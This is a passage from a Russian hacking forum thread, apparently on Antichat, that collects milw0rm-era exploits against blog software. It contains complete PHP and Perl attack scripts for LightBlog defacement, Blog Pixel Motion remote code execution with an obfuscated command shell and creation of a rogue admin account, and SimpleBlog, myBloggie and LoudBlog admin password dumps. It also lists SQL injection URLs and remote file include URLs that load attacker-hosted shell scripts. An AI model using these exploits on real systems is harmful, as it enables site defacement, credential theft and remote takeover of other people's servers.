$packet.=$data;
sendpacketii($packet);
echo "Ok, Post Sent";
break;
case 2: // Deface With XSS
$dfc_url=$argv[4];
$deface_url=urlencode("<script>window.location=('$dfc_url')</script>");
echo "Attack No 2 - Sending New Post With XSS..\r\n";
$data="t=$deface_url";
$data.="&c=msg";
$data.="&Submit=Post";
$packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "Ok, Post Sent";
break;
break;
case 3: // Defacing the original blog.php file
$nickname=$argv[4];
$packet ="GET ".$p."LightBlog/blog_comments.php?comment=Comment&title=title HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("name=\"rand\" id=\"rand\" value=\"",$html);
$temp2=explode("\"></input>",$temp[1]);
$random_code = $temp2[0];
$temp=explode("name=\"rand\" id=\"rand\" value=\"$random_code\"></input>",$html);
$temp2=explode(" ",$temp[1]);
$small_code = $temp2[0];
$data="t=../../blog.php%00";
$data.="&c=ciao";
$data.="&Submit=Post";
$packet="POST ".$p."/LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "blog.php File erased\r\n";
// This part will work only if mq=off elsewhere the exploit will only delete blog.php
$deface_text=urlencode("|:. $nickname got you! .:");
$signature=urlencode(" BlackHawk And Piggy-Marty Rulez info --> <hawkgotyou@gmail.com>");
$packet ="GET ".$p."LightBlog/add_comment_script.php?name=$deface_text&comment=$signature&rand=$random_code&val=$small_code&Submit=Submit&title=../../blog.php/%00 HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Ok, Blog Defaced";
break;
}
?>
# milw0rm.com [2006-10-27]
Def-Blog <= v1.0.1 SQL Injection
USER : comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
PASS : comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
OpenDock Easy Blog <=1.4 File Include
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?
A-Blog v2.0 Remote File Include
http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?
Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin
PHP код:
#!/usr/bin/perl
#
# Affected.scr..: Blog Pixel Motion V2.1.1
# Poc.ID........: 12060927
# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)
# Risk.level....: High
# Vendor.Status.: Unpatched
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip
# Poc.link......: acid-root.new.fr/poc/12060927.txt
# Credits.......: DarkFig
#
# print "This exploit is for educational purpose only" x 999; exit;
#
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Getopt::Long;
use strict;
print STDOUT "\n+", '-' x 60, "+\n";
print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n";
print STDOUT '+', '-' x 60, "+\n";
my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res,$re);
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp,
'choice=s' => \$choice);
if(!$host) {
print STDOUT "| Usage: ./zz.pl --host=[www] --path=[/] --choice=[0] |\n";
print STDOUT "| [Choice.] 1=PHP_Code_Execution 2=Create_Admin |\n";
print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
print STDOUT '+', '-' x 60, "+\a\n";
exit(1);
}
if($host !~ /http/) {$host = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}
if(!$path) {$path = '/';}
if(!$choice) {$choice = 2;}
my $ua = LWP::UserAgent->new();
$ua->agent('0xzilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;
$re->proxy_authorization_basic($proxu, $proxp) if $proxp;
if($choice == 1) {
$re = POST $host.$path.'config.php', [
'nom_blog' => '";
$shcode = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);
$shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
$shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
$shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);
$shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);
$shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);
$shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
$shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
$shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);
eval($shcode); die(); //'];
$ua->request($re);
while(<STDIN>){
chomp($cmd = $_);
if($cmd eq 'exit') { exit(0); }
$re = GET $host.$path.'include/variables.php?cmd='.$cmd;
$res = $ua->request($re);
print STDOUT "\n\n".$res->content."\n\$sh: ";
}
} else {
$re = GET $host.$path.'insere_base.php?login=woot&pass=t00w';
$ua->request($re);
print STDOUT "[+] Admin login.: woot\n";
print STDOUT "[+] Admin passwd: t00w\n";
print STDOUT '+', '-' x 60, "+\n";
}
# milw0rm.com [2006-09-27]
A-Blog V2 Remote File Include
Код:
http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?
Spidey Blog Script <= 1.5 SQL Injection
PHP код:
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]
|
|
|
|
09.06.2008, 22:12
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
xweblog <= 2.1 SQL Injection
Код:
http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
TualBLOG 1.0 SQL Injection
Код:
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
SimpleBlog <= 2.3 SQL Injection
Код:
http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1
icblogger v2 SQL Injection
Код:
http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1
Админка:
http://www.target.com/path/admin/default.asp
SimpleBlog <= 2.0 SQL Injection
PHP код:
#!/usr/bin/perl
#Method found by Chironex Fleckeri
#Exploit By ASIANEAGLE
#Contact:admin@asianeagle.org
#Original advisory: http://www.milw0rm.com/exploits/2228
#Usage: exploitname.pl <host> <path> <id>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print " *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n";
print " *****www.asianeagle.org***** \r\n";
}
sub usage()
{
header();
print " *Usage: $0 <host> <path> <id>\r\n";
print " *<host> = Victim's host ex: www.site.com\r\n";
print " *<path> = SimpleBlog Path ex: /SimpleBlog/\r\n";
print " *<id> = Admin ID ex: 1\r\n";
exit();
}
sub exploit ()
{
$simserver = $ARGV[0];
$simserver =~ s/(http:\/\/)//eg;
$simhost = "http://".$simserver;
$simdir = $ARGV[1];
$simport = "80";
$simtar = "comments.asp?id=";
$simsql = "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20".$ARGV[2];
$simreq = $simhost.$simdir.$simtar.$simsql;
header();
print "- Trying to connect: $simserver\r\n";
$sim = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$simserver", PeerPort => "$simport") || die "- Connection failed...\n";
print $sim "GET $simreq HTTP/1.1\n";
print $sim "Accept: */*\n";
print $sim "Referer: $simhost\n";
print $sim "Accept-Language: tr\n";
print $sim "User-Agent: Mozzilla\n";
print $sim "Cache-Control: no-cache\n";
print $sim "Host: $simserver\n";
print $sim "Connection: close\n\n";
print "Connected...\r\n";
while ($answer = <$sim>) {
if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) {
if ($1 == $ARGV[2]) {
print "Seems Vulnerable :)\r\n";
}
else { die "- Exploit failed\n"; }
}
if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) {
print "- Username: $1\r\n";
}
if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) {
print "- Password: $1\r\n";
}
}
}
# milw0rm.com [2006-08-20]
LBlog <= 1.05 SQL Injection
Код:
http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1
Админка:
http://www.target.com/path/admin
SAPID Blog <= beta 2 Remote File Include
http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_infochannel.inc.php?root_path=[evil_scripts]
http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_meta_info.inc.php?root_path=[evil_scripts]
http://www.site.com/[sapidblog_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]
http://www.site.com/[sapidblog_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
myBloggie <= 2.1.4 Multiple SQL Injections
PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
echo "administrative credentials disclosure exploit\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n\n";
/*
works regardless of php.ini settings
against MySQL >= 4.1 (allowing subs)
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to MyBloggie\n";
echo "Options:\n";
echo " -i specify an existent post id (default: 1)\n";
echo " -T[prefix] specify a table prefix different from default (mb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -d: disclose table prefix (reccomended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n";
echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n";
die;
}
/* software site: http://mybloggie.mywebland.com/
vulnerable code in trackback.php:
...
if(!empty($_REQUEST['title'])) {
$title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));
}
else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No title</p>"); }
if(!empty($_REQUEST['url'])) {
$url=urldecode($_REQUEST['url']);
if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>"); }
}
else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No URL</p>"); }
if(!empty($_REQUEST['excerpt']))
{
$excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));
} else {
$tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No Excerpt</p>");
}
// The blog name
if(!empty($_REQUEST['blog_name']))
{
$blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));
} else
{
$blog_name="No Blog Name";
}
$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ),
gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ),
gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));
$sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,
poster = '$blog_name', home='$url', comment_type='trackback'";
$result = $db->sql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
...
you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument
with MySQL >= 4.1 that allows SELECT subqueries for INSERT...
so you can insert admin username & password hash inside comments and you will see them at screen
also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc
with '%2527' sequence for the single quote char
adn you can disclose table prefix going to:
http://192.168.1.3/mybloggie/index.php?mode=viewdate
you will have an error that disloses a query fragment
-
ex., injecting code in 'title' argument, query becomes:
INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('<!--',password,'-->')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' ,
poster = 'whatever', home='http://www.suntzu.org', comment_type='trackback'
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mb_";
$post_id="1";//admin
$proxy="";
$dt=0;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-i")
{
$post_id=(int) str_replace("-i","",$argv[$i]);
echo "post id -> ".$post_id."\n";
}
if ($temp=="-d")
{
$dt=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
if ($dt)
{
$packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("UNIXTIME(",$html);
$temp2=explode("posts.timest",$temp[1]);
$prefix=$temp2[0];
echo "table prefix -> ".$prefix."\n";
}
}
$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,password,%2527-->%2527)FROM ".$prefix."user)/*";
//some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '<!--' but hash will be clearly visible in comments
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,user,%2527-->%2527)FROM ".$prefix."user)/*";
$data="title=hi".$sql;
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";
$data.="&excerpt=whatever";
$data.="&blog_name=whatever";
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
$temp=explode('"message"><!--',$html);
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode("-->",$temp[$i]);
if (is_hash($temp2[0]))
{
$hash=$temp2[0];
$temp2=explode("-->",$temp[$i+1]);
$admin=$temp2[0];
echo "----------------------------------------------------------------\n";
echo "admin -> ".$admin."\n";
echo "password (md5) -> ".$hash."\n";
echo "----------------------------------------------------------------\n";
die();
}
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2006-08-07]
LoudBlog <= 0.5 SQL Injection / Admin Credentials Disclosure
PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "a dork: \"Powered by LoudBlog\"\r\n\r\n";
/*
works regardless of magic_quotes_gpc settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to LoudBlog\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo " -T[prefix] specify a table prefix different from 'lb_'\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /loudblog/ \r\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="lb_";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$zeros=array(",0,0,0,0", //<- this the one I tested, may change in other versions
",0,0,0",
",0,0",
",0",
",0,0,0,0,0",
",0,0,0,0,0,0",
",0,0,0,0,0,0,0");
for ($i=0; $i<count($zeros); $i++)
{
$sql="'UNION/**/SELECT/**/0,0,CONCAT('*_u_*',nickname,'*_u_*'),'2005-03-29 16:32:42',0,0,0,0,0,0,CONCAT('*_p_*',password,'*_p_*'),0,0,0,0,0,0,0".$zeros[$i]."/**/FROM/**/".$prefix."authors/**/WHERE/**/id=1/*";
//debug
//echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$packet ="GET ".$p."index.php?id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*_p_*",$html);
$hash=$temp[1];
if (is_hash($hash))
{
echo "-------------------------------------------------------\r\n";
echo "password (md5) -> ".$hash."\r\n";
$temp=explode("*_u_*",$html);
echo "admin -> ".$temp[1]."\r\n";
echo "-------------------------------------------------------\r\n";
die;
}
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2006-07-21]
|
|
|
|
08.11.2009, 06:03
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
BLOG:CMS 4.2.1
BLOG:CMS v4.2.1
Раскрытие путей
Уязвимой код:
PHP код:
$this->formdata = array(
'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
'query' => htmlspecialchars(getVar('query')),
);
/photo/index.php?gallery[]=Corvette
Уязвимый код:
PHP код:
$_REQUEST = array_map("htmlentities", $_REQUEST);
Активная XSS
Уязвимость находиться в комментариях к блогу (Его записям).
[a href=javascript:alert();]Free Porno![/a]
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
